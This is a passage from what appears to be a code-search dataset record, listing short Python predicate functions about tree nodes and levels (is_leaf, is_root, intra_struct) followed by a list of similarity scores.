'-'", "def is_last(self, level):\n\n return level == self.levels[-1]", "def isNest(self):\n\t\tif self.nestInfo == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def is_root(self):\n return True", "def is_root(self):\n return True", "def is_leader(self):\n return self.__is_leader", "def is_internal(self):\n if self.is_leaf() or self.is_semileaf():\n return False\n return True", "def isLeaf(self):\n\n return self.children == {}", "def is_connected(self):\n connected = False\n self.state = self.mesh.state()\n if self.state in (STATE_CHILD, STATE_ROUTER, STATE_LEADER, STATE_LEADER_SINGLE):\n connected = True\n return connected", "def direct(self):\n return self.isleaf and not self.isExtended", "def is_cluster_leader(self):\n return self.leader == 'self'", "def is_2d(self) -> bool:\n return self.layers == 1 and self.times == 1", "def is_leaf(self):\n return len(self._children) == 0", "def showSeparator():\n\treturn (1, 0)", "def hasMid(self):\n\t\treturn self.toMid().exists", "def _is_left(self):\n if self.parent is None:\n return None\n else:\n return self is self.parent.left", "def is_parent_of(self):\n return self.hasLabel('parent_of')", "def islchild(self):\n\t\tif (self.parent() and self.parent().lchild() is self): #TODO is or == here\n\t\t\treturn True\n\t\treturn False", "def final_level_text_is_displayed(self):\n final_level_text = self.driver.find_element_by_name(self.FINAL_LEVEL_TEXT_NAME)\n return final_level_text.is_displayed()", "def _isLine(self):\n return (self.width == 0 and self.height > 1) or (self.height == 0 and self.width > 1)", "def _isLine(self):\n return (self.width == 0 and self.height > 1) or (self.height == 0 and self.width > 1)", "def is_subgroup(self, right):\n if right.level() == 1:\n return True\n if is_Gamma0(right):\n return self.level() % right.level() == 0\n if is_Gamma1(right):\n if right.level() >= 3:\n return False\n elif right.level() == 2:\n return self.level() == 2\n # case level 1 dealt with above\n else:\n return GammaH_class.is_subgroup(self, right)", "def intra_struct():\n\n return get('level') == 2", "def initial_level(self):\n return self.get(self._names[\"initial_level\"])", "def is_depth(self):\n return self._is_depth", "def is_leaf(self):\n if self._leftchild or self._rightchild:\n return False\n return True", "def complete_level(self):\n if 
self.ycor() == self.finish_line:\n return True", "def internal(self):\n if self._leftchild or self._rightchild:\n return True\n return False", "def isfixline(number):\n if number[0] == '(':\n return True\n return False", "def isLeaf(self) -> bool:\n return not self.left and not self.right", "def IsTopLevelTest(self):\n return ((not self.IsGroup()) and\n self.parent and\n (self.parent == self.root or self.parent.IsGroup()))", "def is_line(self):\n return True", "def is_line(self):\n return True", "def isInit(this):\n\t\treturn not not this._CAP\n\t\t# Who's here ?\n\t\t# - Me, I kill you.", "def is_start_node():\n return False", "def is_first_collation(self, collation):\n return collation.header.parent_collation_hash == self.env.config['GENESIS_PREVHASH']", "def collapsed(blk):\n if blk is not None and blk.name in COLLAPSIBLE and\\\n len(blk.values) == 1 and blk.values[0] != 0:\n return True\n return False", "def is_root(self):\n return self.comment is None", "def is_cont_node():\n return False", "def is_simple_in_opt(self) -> bool:\n return self.inner_part_of_optional.is_simple", "def has_parent(self):\n return self.parent != None", "def isDiagonal(self):\n raise Exception('Deprecated')\n return self.direction % 2 == 1", "def __nonzero__(self):\n # XXX: check the name and the characterID?\n if self.data.get('name'): return 1\n return 0", "def isFirst(self):\n index = self.parentNode.idevices.index(self)\n return index == 0", "def what_level(index):\n if index == [1,1] or [1,2]:\n level = 1\n else:\n level = 0\n return level", "def is_leaf(self):\n return isinstance(self, Leaf)" ]
[ "0.6308522", "0.60663605", "0.592682", "0.57595533", "0.5757749", "0.56357706", "0.56121695", "0.55404365", "0.5528773", "0.55099", "0.55035543", "0.54934734", "0.5432446", "0.5344056", "0.53366804", "0.53177035", "0.5317035", "0.5309982", "0.52847475", "0.52829605", "0.52761316", "0.5269463", "0.5268106", "0.5261028", "0.5255746", "0.5245973", "0.52141136", "0.5199503", "0.51957625", "0.5194776", "0.5190197", "0.51898795", "0.5188589", "0.51750946", "0.5171196", "0.51533145", "0.51454884", "0.5136007", "0.5132644", "0.51324815", "0.5122685", "0.5122685", "0.5122685", "0.5122685", "0.5115832", "0.5114884", "0.51140773", "0.5111661", "0.51078373", "0.51009023", "0.5081631", "0.50793344", "0.5077668", "0.50660366", "0.50638485", "0.5047929", "0.5040562", "0.50386155", "0.50386155", "0.50379765", "0.50356144", "0.502788", "0.5019262", "0.50065494", "0.5004008", "0.50026447", "0.5002097", "0.49955693", "0.49948516", "0.4990291", "0.4974735", "0.4974504", "0.4965114", "0.4963792", "0.4963792", "0.4952702", "0.49525794", "0.49476185", "0.49329332", "0.49287364", "0.49150842", "0.49143058", "0.49098343", "0.49045828", "0.49023336", "0.48722112", "0.48722112", "0.48709762", "0.4866956", "0.48643386", "0.48636824", "0.4863242", "0.48629224", "0.48616445", "0.4860962", "0.48606965", "0.48585245", "0.48501325", "0.48378235", "0.48331434" ]
0.7897029
0
Indicate whether the current level is level 2 (AM fungal structures).
def intra_struct(): return get('level') == 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_subgroup(self, right):\n if right.level() == 1:\n return True\n if is_Gamma0(right):\n return self.level() % right.level() == 0\n if is_Gamma1(right):\n if right.level() >= 3:\n return False\n elif right.level() == 2:\n return self.level() == 2\n # case level 1 dealt with above\n else:\n return GammaH_class.is_subgroup(self, right)", "def is_single_level(self):\n return self.fragments_tree.height <= 2", "def is_multi_level(self):\n return self.is_flag_set(StatefulParser.FLAGS.MULTI_LEVEL)", "def is_2d(self) -> bool:\n return self.layers == 1 and self.times == 1", "def _contains_sl2(self, a,b,c,d):\n return (c % self.level() == 0)", "def even(self):\n return self._ % 2 == 0", "def has_2D(self):\n\t\tif self.have_fastas is False:\n\t\t\tself._extract_fastas_from_fast5()\n\t\t\tself.have_fastas = True\n\n\t\tif self.fastas.get('twodirections') is not None:\n\t\t\treturn True\n\t\treturn False", "def cat_l2_supported():\n return common.CAT_L2_CAP in SYSTEM_CAPS", "def colonization():\n\n return get('level') == 1", "def has_action2(self, feature):\n return feature in self._action2", "def check_lighting_state_room2():\n if timer_lights_on_off_room2() == room2_lux():\n pass\n else:\n light_room2(timer_lights_on_off_room1())", "def level(self):\n return self.init_v[2]", "def is_depth(self):\n return self._is_depth", "def isSecond(self):\n return _libsbml.Unit_isSecond(self)", "def test_build19_level2_additions():\n f = Level2File(get_test_data('Level2_KDDC_20200823_204121.ar2v'))\n assert f.vcp_info.vcp_version == 1\n assert f.sweeps[0][0].header.az_spacing == 0.5", "def hasTwoSons(self):\n \n return self._leftSon is not None and self._rightSon is not None", "def isSetBindingSite2(self):\n return _libsbml.InSpeciesTypeBond_isSetBindingSite2(self)", "def checkL3v2Compatibility(self):\n return _libsbml.SBMLDocument_checkL3v2Compatibility(self)", "def level_unlocked(self) -> bool:\r\n return self.player_profile.is_level_unlocked(self.level_num)", "def requires_2sa(self):\n return (\n self.data.get(\"hsaChallengeRequired\", False)\n and self.data[\"dsInfo\"].get(\"hsaVersion\", 0) >= 1\n )\n # FIXME: Implement 2FA for hsaVersion == 2 # pylint: disable=fixme", "def isAutoLevel(self):\n return self.getAutoLevelFunction() is not None", "def is_even(self):\n return True", "def is_crossing_len2(self, gp: GriddedPerm) -> bool:\n return (\n len(gp) == 2\n and gp.occupies(self.first_cell)\n and gp.occupies(self.second_cell)\n )", "def is_level(self, state):\n \n logging.info('checking state '+state+' against self '+str(self.state))\n result = False\n if('up' == state):\n result = (self.state == 255)\n elif('down' == state):\n result = (self.state == 0)\n elif(state.isdigit()):\n state = int(state)\n result = (abs(self.state - int(255*state/100)) < 2)\n return result", "def has_other_half(self) -> bool:\n return self.layout in (\n \"flip\",\n \"split\",\n \"transform\",\n \"meld\",\n \"aftermath\",\n \"adventure\",\n \"modal_dfc\",\n )", "def has_stereo(gra):\n return bool(atom_stereo_keys(gra) or bond_stereo_keys(gra))", "def check_version_2(dataset):\n\n if float(dataset.get('version')) >= 2.0 \\\n if dataset.get('version') else False:\n return True\n else:\n return False", "def is_i2s_enabled(self):\n return ((self.get_control() & CONTROL_ENABLE) > 0)", "def isPower2(num):\n\treturn ((num & (num - 1)) == 0) and num > 0", "def isPower2(num):\n\treturn ((num & (num - 1)) == 0) and num > 0", "def isNest(self):\n\t\tif self.nestInfo == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def 
is_on(self, level):\n\n return self.log_level >= level", "def sd_2_non_negative_rule(_m):\r\n\r\n return m.sd_2 >= 0", "def checkL2v2Compatibility(self, inConversion=False):\n return _libsbml.SBMLDocument_checkL2v2Compatibility(self, inConversion)", "def is_down(self):\n \n return self.is_level('down')", "def is_flat(self):\n if self.master:\n return self.master.is_flat\n\n return len(self.levels) == 1", "def _get_static_level2(self):\n return self.__static_level2", "def has_crossing_len2_ob(self) -> bool:\n fcell = self.first_cell\n scell = self.second_cell\n if self._fuse_row:\n possible_obs = [\n GriddedPerm((0, 1), (fcell, scell)),\n GriddedPerm((1, 0), (scell, fcell)),\n ]\n else:\n possible_obs = [\n GriddedPerm((0, 1), (fcell, scell)),\n GriddedPerm((1, 0), (fcell, scell)),\n ]\n return any(ob in possible_obs for ob in self._tiling.obstructions)", "def is_top_level(self) -> bool:\n return self._indent == ''", "def _deeper_level(first, second):\n for level1 in p_level_of(first):\n for level2 in p_level_of(second):\n if level1 < level2:\n return True\n return False", "def __gt__(self,f2):\n return self.__num * f2.den > self.__den * f2.num", "def feature_two(ds, tup):\n # try:\n # if (nx.shortest_path_length(G, frm, to) == 2):\n # o2.write(\"trusted\\n\")\n # else:\n # o2.write(\"unverified\\n\")\n # except:\n # o2.write(\"unverified\\n\")\n\n A_child = ds[tup[0]]\n C_child = ds[tup[1]]\n return ((len(A_child.intersection(C_child)) > 0) | (tup[0] in ds[tup[1]]))", "def is_simple(self):\n return self.upper_binary_tree() == self.lower_binary_tree()", "def test_level2(fname, voltime, num_sweeps, mom_first, mom_last, expected_logs, caplog):\n caplog.set_level(logging.WARNING, 'metpy.io.nexrad')\n f = Level2File(get_test_data(fname, as_file_obj=False))\n assert f.dt == voltime\n assert len(f.sweeps) == num_sweeps\n assert len(f.sweeps[0][0][-1]) == mom_first\n assert len(f.sweeps[-1][0][-1]) == mom_last\n assert len(caplog.records) == expected_logs", "def is_compatible(self, e2):\n\n return (self.type == TypeEdge.HOLE and e2.type == TypeEdge.HEAD) or (self.type == TypeEdge.HEAD and e2.type == TypeEdge.HOLE) \\\n or self.type == TypeEdge.UNDEFINED or e2.type == TypeEdge.UNDEFINED", "def __isFarFromLevel(self, l):\n\n s = np.mean(self.df['high'] - self.df['low'])\n return np.sum([abs(l-x) < s for x in self.levels]) == 0", "def __eq__(self, other: Level) -> bool:\n if isinstance(other, Level):\n return str(self) == str(other)\n if isinstance(other, LevelOfTheory):\n if self.method == other.method and self.basis == other.basis:\n return True\n return False", "def hasBzip2():\n return _libsbml.SBMLReader_hasBzip2()", "def isActive(self):\n return self.sides[0].isActive() and self.sides[1].isActive()", "def isSpo2(obxDict):\n readingCode = getReadingCode(obxDict)\n return readingCode == '2710-2'", "def is_stack(self) -> bool:\n return self.layers > 1", "def is_internal(self):\n if self.is_leaf() or self.is_semileaf():\n return False\n return True", "def event_m20_11_x27(z104=20111500, mode2=1, goods3=60536000):\n \"\"\"State 0,1: Judgment to examine\"\"\"\n IsObjSearched(0, z104)\n assert ConditionGroup(0)\n \"\"\"State 2: Available branch\"\"\"\n # goods:60536000:Pharros' Lockstone\n if (ItemCount(goods3, 1, 1, 0) > mode2) != 0:\n \"\"\"State 3: Available end\"\"\"\n return 0\n else:\n \"\"\"State 4: Unusable termination\"\"\"\n return 1", "def GetNarrowBanding(self) -> \"bool\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_GetNarrowBanding(self)", 
"def canSee(self, p1, p2):\n\n\t\t# lift two points a bit above the grouond to prevent the\n\t\t# collision ray from hitting the edge of shallow terrain;\n\t\t# also, put them at different level so that the ray has\n\t\t# nonzero length (a requirement for collisionSegment()).\n\t\tp1[2] += 1\n\t\tp2[2] += 0.9\n\t\tself.auxCSNp.node().modifySolid(self.auxCSSolid).setPointA(p1)\n\t\tself.auxCSNp.node().modifySolid(self.auxCSSolid).setPointB(p2)\n\t\n\t\tself.csTrav.traverse(render)\n\t\n\t\treturn (self.csHandler.getNumEntries() == 0)", "def has_twopair(self):\n count = 0\n self.suit_hist()\n for val in self.ranks.values():\n if val == 2:\n count += 1\n if count >= 2:\n self.rank_per_hand['1'] = \"two pair\"\n return True\n return False", "def hasBzip2():\n return _libsbml.SBMLWriter_hasBzip2()", "def isOpen(self):\n\t\treturn not self.endgame", "def is_last(self, level):\n\n return level == self.levels[-1]", "def is_semileaf(self):\n if self._leftchild and self._rightchild:\n return False\n if not self._leftchild and not self._rightchild:\n return False\n return True", "def is_version_2_6() -> bool:\n v = get_version()\n if v[1] != \"singularity\" and v[1] != \"singularity-ce\":\n return False\n return v[0][0] == 2 and v[0][1] == 6", "def is_core(self):\n #core_stems = (\n # 'Algebra','Geometry','Precalculus','Calculus',\n # 'Biology','Chemistry','Physics','Living Environment','Global Environment','Scientific Literacy',\n # 'History','Economics',\n # 'Literature','Language','Writing','AP','Sem',\n # 'Korean',\n # )\n #core = False\n #for stem in core_stems:\n # if stem in self.title:\n # core = True\n \n return self.level>0", "def is_even(self):\n pass", "def stale_info_type_2(self):\n config_values = self.config.values()\n bot_exists = constants.BOTTOM in config_values\n empty_exists = [] in config_values\n if bot_exists or empty_exists:\n logger.debug(f\"Stale info (type 2) found! 
Current config: {self.config}\")\n return bot_exists or empty_exists", "def is_team(self):\n return self.hasLabel('Team')", "def __bool__(self):\n return _osgAnimation.vectorVec2Keyframe___bool__(self)", "def is_route_throu(self):\n\n # VPR stores route-through LUTs as \"open\" blocks with mode set to\n # \"wire\".\n return self.is_leaf and self.name == \"open\" and self.mode == \"wire\"", "def compare(self, t2) -> bool:\n return True if self.get_edge(t2) >= 0 else False", "def checkL2v4Compatibility(self):\n return _libsbml.SBMLDocument_checkL2v4Compatibility(self)", "def _is_ue3(self):\n\n return False", "def _is_service_catalog_v2(catalog):\n return type(catalog) is sc.ServiceCatalogV2", "def get_structure2(self):\n return self.atom2.fragment.chain.model.structure", "def what_level(index):\n if index == [1,1] or [1,2]:\n level = 1\n else:\n level = 0\n return level", "def __ge__(self,f2):\n return self > f2 or self == f2", "def test_G_2_by_2_2tailed_equal(self):\r\n self.assertFloatEqual(0, G_2_by_2(1, 1, 1, 1, False, False)[0])\r\n self.assertFloatEqual(0, G_2_by_2(100, 100, 100, 100, False, False)[0])\r\n self.assertFloatEqual(0, G_2_by_2(100, 100, 100, 100, True, False)[0])", "def is_block(self):\n\t\treturn self.name in get_elements_collection(self.__res, 'block_level')", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)", "def update2_trace(self):\r\n tmp = [row.copy() for row in self.grid]\r\n changed = False\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if self.grid[y][x] == '#' and sum(self.is_occupied(p) for p in self.neighbours[(x, y)]) >= 5:\r\n tmp[y][x] = 'L'\r\n changed = True\r\n elif self.grid[y][x] == 'L' and self.is_available2_trace(x, y):\r\n tmp[y][x] = '#'\r\n changed = True\r\n self.grid = tmp\r\n return changed", "def is_team(self):\n return self._tag == 'team'", "def is_root(self):\n return self.unpack_word(0x2) & 0x0004 > 0", "def maximum_level(self, question_type):\n\t\treturn 2", "def has_leaf(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"has_leaf\"))\r\n return self._hvac_mode == \"eco\"", "def is_structure(self) -> bool:\n return ATTRIBUTE.Structure.value in self.type_data.attributes", "def is_structure(self) -> bool:\n return ATTRIBUTE.Structure.value in self.type_data.attributes", "def _Schoof_mod2(self):\n if not self.b:\n result = 0\n _log.debug(\"(%d, 2) #\" % result)\n else:\n linearfactors = UniVarPolynomial({card(self.basefield):self.basefield.one, 1:-self.basefield.one}, self.basefield)\n if GCD(self.cubic, linearfactors).degree() == 0:\n result = 1\n _log.debug(\"(%d, 2) ##\" % result)\n else:\n result = 0\n _log.debug(\"(%d, 2) ###\" % result)\n return (result, 2)", "def is_FSAL(self):\n if np.all(self.A[-1,:]==self.b): return True\n else: return False", "def is_closed(self) -> bool | None:\n if self.data.levelpercentage is None:\n return None\n return self.data.levelpercentage == 100 # type: ignore [no-any-return]", "def SBMLReader_hasBzip2():\n return _libsbml.SBMLReader_hasBzip2()", "def is_homolog(self, segment2):\n hdict = {}\n\n for fragment in self.fragment_list:\n hdict[fragment.fragment_id] = fragment.res_name\n\n for fragment in segment2.fragment_list:\n if hdict.get(fragment.fragment_id, fragment.res_name) != fragment.res_name:\n return False\n\n return True", "def blanc(self):\n if self.__valeur1 == 0:\n return True\n if self.__valeur2 == 0:\n return True\n else:\n 
return False", "def is_terminal_state(self):\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)", "def depth_check(self, depth):\r\n if depth >= self.ply:\r\n return True\r\n return False", "def at(self) -> bool:\n\n return 'step_active' in self.__get_step_2_div().get_attribute(\"class\")", "def __gt__(self, hand2):\n # TODO: Implement\n if self.type > hand2.type:\n return True\n elif self.type < hand2.type:\n return False\n elif self.type == hand2.type:\n # NOTE: This ignores the case in which both hands have the same type\n # and rank. I think this is okay for now.\n return self.rank > hand2.rank", "def is_up(self):\n \n return self.is_level('up')", "def DualMode(self) -> bool:", "def __le__(self,f2):\n return not self > f2 or self == f2", "def isLevelMaxReached(self) :\n if self.id_level == len(self.list_level) - 1:\n return True\n return False", "def block2_threshold(self):\n return self._safe_value(VAR_BLOCK2THRESHOLD, float)" ]
[ "0.6321547", "0.62854135", "0.62632716", "0.6087753", "0.59138495", "0.5752362", "0.5700526", "0.56212634", "0.55640566", "0.55273724", "0.5408885", "0.5408016", "0.53746355", "0.53725296", "0.5317222", "0.5312037", "0.5294672", "0.52933645", "0.52883124", "0.5273141", "0.5252779", "0.5240626", "0.5239407", "0.5237722", "0.5227749", "0.52274907", "0.5226634", "0.52169967", "0.5210894", "0.5210894", "0.52035207", "0.52022356", "0.5183489", "0.5182178", "0.5180906", "0.5175882", "0.51693857", "0.51608545", "0.5137518", "0.51346475", "0.51339436", "0.51303494", "0.51273733", "0.5127251", "0.5120428", "0.51196486", "0.5109459", "0.5046618", "0.50427914", "0.50384223", "0.50342584", "0.50272715", "0.50236577", "0.5014213", "0.5000598", "0.5000383", "0.49946922", "0.49887392", "0.4979942", "0.49687317", "0.4958143", "0.4942256", "0.49410197", "0.4937454", "0.49348846", "0.49346724", "0.49344566", "0.49249747", "0.49010822", "0.49007517", "0.4899755", "0.489278", "0.4889378", "0.48892704", "0.4881674", "0.48812944", "0.48681223", "0.48681223", "0.48640513", "0.48598954", "0.48553443", "0.48527882", "0.48491052", "0.48448908", "0.48448908", "0.48447302", "0.48415783", "0.48338205", "0.48327556", "0.48299742", "0.48286736", "0.48269773", "0.48251513", "0.4825021", "0.48148897", "0.4804797", "0.4798151", "0.4797401", "0.47947484", "0.47943264" ]
0.66111106
0
Defines arguments used in training mode.
def training_subparser(subparsers): parser = subparsers.add_parser('train', help='learns how to identify AMF structures.', formatter_class=RawTextHelpFormatter) x = PAR['batch_size'] parser.add_argument('-b', '--batch_size', action='store', dest='batch_size', metavar='NUM', type=int, default=x, help='training batch size.' '\ndefault value: {}'.format(x)) x = PAR['drop'] parser.add_argument('-k', '--keep_background', action='store_false', dest='drop', default=x, help='keep all background tiles.' '\nby default, downscale background to equilibrate classes.') x = PAR['data_augm'] parser.add_argument('-a', '--data_augmentation', action='store_true', dest='data_augm', default=x, help='apply data augmentation (hue, chroma, saturation, etc.)' '\nby default, data augmentation is not used.') x = PAR['save_augmented_tiles'] parser.add_argument('-sa', '--save_augmented_tiles', action='store', dest='save_augmented_tiles', metavar='NUM', type=int, default=x, help='save a subset of augmented tiles.' '\nby default, does not save any tile.') x = PAR['summary'] parser.add_argument('-s', '--summary', action='store_true', dest='summary', default=x, help='save CNN architecture (CNN graph and model summary)' '\nby default, does not save any information.') x = PAR['outdir'] parser.add_argument('-o', '--outdir', action='store', dest='outdir', default=x, help='folder where to save trained model and CNN architecture.' '\ndefault: {}'.format(x)) x = PAR['epochs'] parser.add_argument('-e', '--epochs', action='store', dest='epochs', metavar='NUM', type=int, default=x, help='number of epochs to run.' '\ndefault value: {}'.format(x)) x = PAR['patience'] parser.add_argument('-p', '--patience', action='store', dest='patience', metavar='NUM', type=int, default=x, help='number of epochs to wait before early stopping is triggered.' '\ndefault value: {}'.format(x)) x = PAR['learning_rate'] parser.add_argument('-lr', '--learning_rate', action='store', dest='learning_rate', metavar='NUM', type=int, default=x, help='learning rate used by the Adam optimizer.' '\ndefault value: {}'.format(x)) x = PAR['vfrac'] parser.add_argument('-vf', '--validation_fraction', action='store', dest='vfrac', metavar='N%', type=int, default=x, help='Percentage of tiles used for validation.' '\ndefault value: {}%%'.format(x)) level = parser.add_mutually_exclusive_group() level.add_argument('-1', '--CNN1', action='store_const', dest='level', const=1, help='Train for root colonisation (default)') level.add_argument('-2', '--CNN2', action='store_const', dest='level', const=2, help='Train for fungal hyphal structures.') x = None parser.add_argument('-net', '--network', action='store', dest='model', metavar='H5', type=str, default=x, help='name of the pre-trained network to use as a basis for training.' '\ndefault value: {}'.format(x)) parser.add_argument('-sr', '--super_resolution', action='store_const', dest='super_resolution', const=True, help='Apply super-resolution before predictions.' '\ndefault value: no super-resolution.') x = None parser.add_argument('-g', '--generator', action='store', dest='generator', metavar='H5', type=str, default=x, help='name of the pre-trained generator.' '\ndefault value: {}'.format(x)) x = None parser.add_argument('-d', '--discriminator', action='store', dest='discriminator', metavar='H5', type=str, default=x, help='name of the pre-trained discriminator.' '\ndefault value: {}'.format(x)) x = PAR['input_files'] parser.add_argument('image', nargs='*', default=x, help='plant root image to process.' 
'\ndefault value: {}'.format(x)) return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def feed_training_args(self):\n return {}", "def add_train_val_arguments(self):\n self.add_train_arguments()\n self.add_val_arguments()", "def add_train_arguments(self):\n parser = self.parser\n parser.add_argument(\"source_dir\", help=\"Directory containing test source images.\")\n parser.add_argument(\"target_dir\", help=\"Directory containing test target images.\")\n parser.add_argument(\"--batch_size\", \"-bs\", default=1, type=int, help=\"Batch size.\")\n parser.add_argument(\"--cycle_loss_weight\", \"-clw\", default=0, type=int, help=\"Cycle loss weight.\")\n parser.add_argument(\n \"--discriminator_architecture\", \"-d\", default=\"basic\",\n help=\"architecture of the discriminator ('basic' | 'N_layers')\"\n )\n parser.add_argument(\n \"--discriminator_filters\", \"-df\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the discriminator.\"\n )\n parser.add_argument(\n \"--n_frames_discriminator\", \"-dn\", type=int, default=0,\n help=\"Number of frames the sequence discriminators discriminate.\"\n )\n parser.add_argument(\n \"--discriminator_temporal_scales\", \"-dts\", type=int, default=1,\n help=\"Number of temporal scales in framerate sampling (= number of sequence discriminators).\"\n )\n parser.add_argument(\n \"--feature_matching_loss_weight\", \"-fmlw\", default=0, type=int, help=\"Loss weight of feature matching.\"\n )\n parser.add_argument(\n \"--flow_loss_weight\", \"-flw\", default=0, type=int, help=\"Loss weight of flow loss in vid2vid.\"\n )\n parser.add_argument(\n \"--gan_mode\", \"-gan\", default=\"lsgan\", help=\"type of the gan loss ('vanilla' | 'lsgan' | 'wgangp').\"\n )\n parser.add_argument(\n \"--init_epoch\", \"-ie\", default=0, type=int, help=\"If set, load models saved at a specific epoch.\"\n )\n parser.add_argument(\n \"--init_checkpoint_dir\", \"-i\",\n help=\"If set, initialize models from saved checkpoints in init_checkpoint_dir.\"\n )\n parser.add_argument(\n \"--log_every\", \"-le\", default=100, type=int, help=\"Log losses and images every log_every iterations.\"\n )\n parser.add_argument(\n \"--log_images_every\", \"-lie\", default=0, type=int,\n help=\"If specified, log images every log_images_every iterations, instead of every log_every iterations.\"\n )\n parser.add_argument(\"--load_height\", \"-lh\", type=int, default=0, help=\"image load height (before cropping).\")\n parser.add_argument(\"--l1_loss_weight\", \"-llw\", default=0, type=int, help=\"L1 loss weight.\")\n parser.add_argument(\"--learning_rate\", \"-lr\", default=0.0002, type=float, help=\"Learning rate.\")\n parser.add_argument(\"--load_width\", \"-lw\", type=int, default=0, help=\"Image load width (before cropping).\")\n parser.add_argument(\n \"--mask_loss_weight\", \"-mlw\", default=0, type=int, help=\"Loss weight of mask loss (weight loss) in vid2vid.\"\n )\n parser.add_argument(\"--num_epochs\", \"-ne\", default=10, type=int, help=\"Number of training epochs.\")\n parser.add_argument(\n \"--perceptual_loss_weight\", \"-plw\", default=0, type=int, help=\"Loss weight of perceptual (VGG19) loss.\"\n )\n parser.add_argument(\n \"--recycle_loss_weight\", \"-rclw\", default=0, type=int, help=\"Loss weight of recycle in RecycleGAN.\"\n )\n parser.add_argument(\n \"--recycle_predictor_architecture\", \"-rcp\", default=\"resnet_6blocks\",\n help=\"Architecture of RecycleGAN predictor. 
See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--recycle_predictor_filters\", \"-rcpf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the RecycleGAN predictor.\"\n )\n parser.add_argument(\n \"--save_every\", \"-se\", default=1, type=int, help=\"Save model checkpoints every save_every epochs.\"\n )\n parser.add_argument(\n \"--spatial_scaling\", \"-ss\", default=[1], type=float, nargs='+',\n help=\"Set steps for spatial scaling.\\n\"\n \"I.e. [0.25, 0.5, 1] to train a model with width and height 256 on 64 > 128 > 256 images.\"\n )\n parser.add_argument(\"--timecycle_loss\", \"-tcl\", default=\"l1\", help=\"Timecycle loss ('l1' | 'l2')\")\n parser.add_argument(\"--timecycle_loss_weight\", \"-tclw\", default=0, type=int, help=\"Timecycle loss weight.\")\n parser.add_argument(\n \"--timecycle_motion_model_architecture\", \"-tcmm\", default=\"resnet_1blocks\",\n help=\"Architecture of Timecycle motion model. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--timecycle_motion_model_filters\", \"-tcmmf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the Timecycle motion model.\"\n )\n parser.add_argument(\n \"--timecycle_separate_motion_models\", \"-tcsmm\", action=\"store_true\",\n help=\"Set to use separate motion models for forward/backward predictions.\"\n )\n parser.add_argument(\n \"--timecycle_type\", \"-tct\", default=\"conditional\",\n help=\"Type of Timecycle ('conditional' | 'pingpong').\"\n )\n parser.add_argument(\n \"--timecycle_warp_loss_weight\", \"-tcwlw\", default=0, type=int, help=\"Timecycle warp loss weight.\"\n )\n parser.add_argument(\n \"--temporal_scaling\", \"-ts\", default=[1], type=float, nargs='+',\n help=\"Set steps for temporal scaling.\\n\"\n \"I.e. 
[0.2, 0.6, 1] to train a model with block_size 5 on 1 -> 3 -> 5 frames.\"\n )\n parser.add_argument(\n \"--warp_loss_weight\", \"-wlw\", default=0, type=int, help=\"Loss weight of warp loss in vid2vid.\"\n )", "def set_args(self, args: Namespace) -> None:\n self.epochs = args.epochs\n self.lrdecay = args.lrdecay\n self.lrpatience = args.lrpatience\n self.ntest = args.ntest\n self.ndiscard = args.ndiscard\n self.predict = args.predict\n self.printfreq = args.printfreq\n self.savefreq = args.savefreq\n self.resume = args.resume\n self.seed = args.seed\n self.timesteps = args.timesteps\n self.verbose = args.verbose", "def add_train_args(parser):\n\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--dataset', type=str, default=\"searchqa\",\n help='Dataset: searchqa, quasart or unftriviaqa')\n runtime.add_argument('--base_dir', type=str, default=\".\",\n help='base_dir of the pre-processing')", "def modify_train_args(args: Namespace):\n if args.message.startswith('tetra'):\n setattr(args, 'tetra', True)\n else:\n setattr(args, 'tetra', False)\n\n # shuffle=False for custom sampler\n if args.shuffle_pairs:\n setattr(args, 'no_shuffle', True)\n\n setattr(args, 'device', torch.device('cuda' if torch.cuda.is_available() else 'cpu'))", "def create_training_args(self, input_dict, output_dict, exec_properties,\n executor_class_path, training_inputs,\n job_id) -> Dict[Text, Any]:\n pass", "def add_train_args(parser: ArgumentParser):\n # General arguments\n parser.add_argument('--task', type=str, default='regression',\n help='Regression or classification task')\n parser.add_argument('--seed', type=int, default=0,\n help='Random seed to use when splitting data into train/val/test sets.'\n 'When `num_folds` > 1, the first fold uses this seed and all'\n 'subsequent folds add 1 to the seed.')\n parser.add_argument('--data_path', type=str,\n help='Path to data CSV file')\n parser.add_argument('--split_path', type=str,\n help='Path to .npy file containing train/val/test split indices')\n parser.add_argument('--log_dir', type=str, default=None,\n help='Directory where model checkpoints will be saved')\n parser.add_argument('--model_path', type=str, default=None,\n help='Path to model file to load for evaluation time')\n parser.add_argument('--eval_output_dir', type=str, default=None,\n help='Directory to store outputs of evaluation, including predictions and attention visualization')\n\n\n # Training arguments\n parser.add_argument('--epoch', type=int, default=0,\n help='Starting epoch')\n parser.add_argument('--checkpoint_load_path', type=str,\n help='Path to model to load as checkpoint when resuming training')\n parser.add_argument('--checkpoint_dir', type=str,\n help='Path to save checkpoint model')\n parser.add_argument('--viz_dir', type=str,\n help='Path to save attention visualization')\n\n parser.add_argument('--n_epochs', type=int, default=60,\n help='Number of epochs to run')\n parser.add_argument('--batch_size', type=int, default=50,\n help='Batch size')\n parser.add_argument('--warmup_epochs', type=float, default=2.0,\n help='Number of epochs during which learning rate increases linearly from'\n 'init_lr to max_lr. 
